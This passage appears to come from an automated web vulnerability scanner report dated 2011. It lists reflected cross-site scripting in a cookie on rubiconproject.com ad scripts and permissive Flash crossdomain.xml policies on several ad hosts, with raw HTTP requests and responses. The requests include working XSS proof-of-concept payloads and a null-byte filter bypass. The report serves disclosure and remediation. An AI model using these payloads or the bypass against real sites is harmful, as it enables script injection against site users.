Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=742b8"><script>alert(1)</script>a8c3bae217f; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; rdk=7725/12338; rdk2=0; ses2=12338^3; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:06 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:15:06 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Wed, 07-Sep-2011 15:15:06 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^179&12590^56; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63893; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2959

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=742b8"><script>alert(1)</script>a8c3bae217f" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

2.90. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55008"-alert(1)-"715ba0f9f06 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/dk.js?defaulting_ad=i33333331362D317332.js&size_id=2&account_id=7856&site_id=12590&size=728x90&cb=0.42522372608073056 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=55008"-alert(1)-"715ba0f9f06; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:19 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:15:19 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=46; expires=Wed, 07-Sep-2011 15:15:19 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^179&12590^117; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63880; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1595

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3155685"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=55008"-alert(1)-"715ba0f9f06\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.91. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %008ab72"-alert(1)-"f00a1aa43f9 was submitted in the ruid cookie. This input was echoed as 8ab72"-alert(1)-"f00a1aa43f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /a/dk.js?defaulting_ad=i33333331362D317332.js&size_id=2&account_id=7856&site_id=12590&size=728x90&cb=0.7374124012421817 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.8213596055284142&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=%008ab72"-alert(1)-"f00a1aa43f9; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; rdk15=0; ses15=12338^5&12590^5; rdk=7856/12590; rdk2=0; ses2=12338^7&12590^4; csi2=3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3151648.js^1^1315404875^1315404875&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:56 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:19:56 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=2; expires=Wed, 07-Sep-2011 15:19:56 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=ed39a%250d%250a9fcab745cce^&12590^4; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63603; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3165013.js^2^1315405196^1315405196&3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; expires=Wed, 14-Sep-2011 14:19:56 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1598

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3165013"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=%008ab72"-alert(1)-"f00a1aa43f9\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3. Flash cross-domain policy
There are 69 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://ad.agkn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.agkn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"219-1313398290000"
Last-Modified: Mon, 15 Aug 2011 08:51:30 GMT
Content-Type: application/xml
Content-Length: 219
Date: Wed, 07 Sep 2011 14:15:20 GMT
Connection: close

<?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
    <cross-domain-policy>
    <allow-access-from domain="*" />
    </cr
...[SNIP]...

3.2. http://ad.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Wed, 07 Sep 2011 14:14:22 GMT
Content-Type: text/xml;charset=UTF-8
Date: Wed, 07 Sep 2011 14:14:22 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

3.3. http://adfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Wed, 07 Sep 2011 14:14:35 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.4. http://adsfac.us/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adsfac.us

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT
Accept-Ranges: bytes
ETag: "0291dc9322c91:0"
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Wed, 07 Sep 2011 14:21:02 GMT
Connection: close
Content-Length: 125

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cross-domain-policy>


3.5. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Thu, 08 Sep 2011 14:14:17 GMT
Date: Wed, 07 Sep 2011 14:14:17 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.6. http://bh.contextweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Accept-Ranges: bytes
ETag: W/"269-1314729061000"
Last-Modified: Tue, 30 Aug 2011 18:31:01 GMT
Content-Type: application/xml
Content-Length: 269
Date: Wed, 07 Sep 2011 14:16:01 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
               <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.7. http://bid.rb.ntc.ace.advertising.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.rb.ntc.ace.advertising.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bid.rb.ntc.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 07 Sep 2011 14:14:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:31 GMT
Content-Type: text/xml
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.8. http://bs.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 07 Sep 2011 14:14:23 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


3.9. http://cdn.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Wed, 07 Sep 2011 14:14:22 GMT
Date: Wed, 07 Sep 2011 14:14:22 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

3.10. http://cdn4.eyewonder.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn4.eyewonder.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:17 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.11. http://content.yieldmanager.edgesuite.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.yieldmanager.edgesuite.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.yieldmanager.edgesuite.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "428510723c54e1303cd7c65e002e5c20:1140130382"
Last-Modified: Thu, 16 Feb 2006 22:53:38 GMT
Accept-Ranges: bytes
Content-Length: 201
Content-Type: application/xml
Cache-Control: max-age=31536000
Date: Wed, 07 Sep 2011 14:20:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.12. http://d3.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:34:56 GMT
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 248
Date: Wed, 07 Sep 2011 14:14:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.13. http://d7.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=5429
Date: Wed, 07 Sep 2011 14:14:20 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.14. http://e.yimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://e.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: e.yimg.com

Response

HTTP/1.0 200 OK
Date: Wed, 07 Sep 2011 00:48:28 GMT
Cache-Control: max-age=315360000
Expires: Sat, 04 Sep 2021 00:48:28 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 48503
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.15. http://edge.aperture.displaymarketplace.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://edge.aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:1b06"
Server: Microsoft-IIS/6.0
X-Server: D2A.NJ-a.dm.com_x
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Wed, 07 Sep 2011 14:15:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:15:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

3.16. http://espn-media.unitedfuture.com.s3.amazonaws.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn-media.unitedfuture.com.s3.amazonaws.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: espn-media.unitedfuture.com.s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: zK7zaHiDXGCEZEqEThCTFm0axSqne8S7+V5NYbmJOvT8AeNTo4VGn1zUoEnH+jgL
x-amz-request-id: 85E0D11E6B66A525
Date: Wed, 07 Sep 2011 14:15:12 GMT
x-amz-meta-cb-modifiedtime: Tue, 03 Aug 2010 22:06:08 GMT
Last-Modified: Wed, 18 Aug 2010 21:56:31 GMT
ETag: "ae0d9ae5889a0eb857d5ac66b0a439ae"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 185
Server: AmazonS3

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control permitted-cross-domain-policies="master-only" />
</cross-domain-policy>

3.17. http://external.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
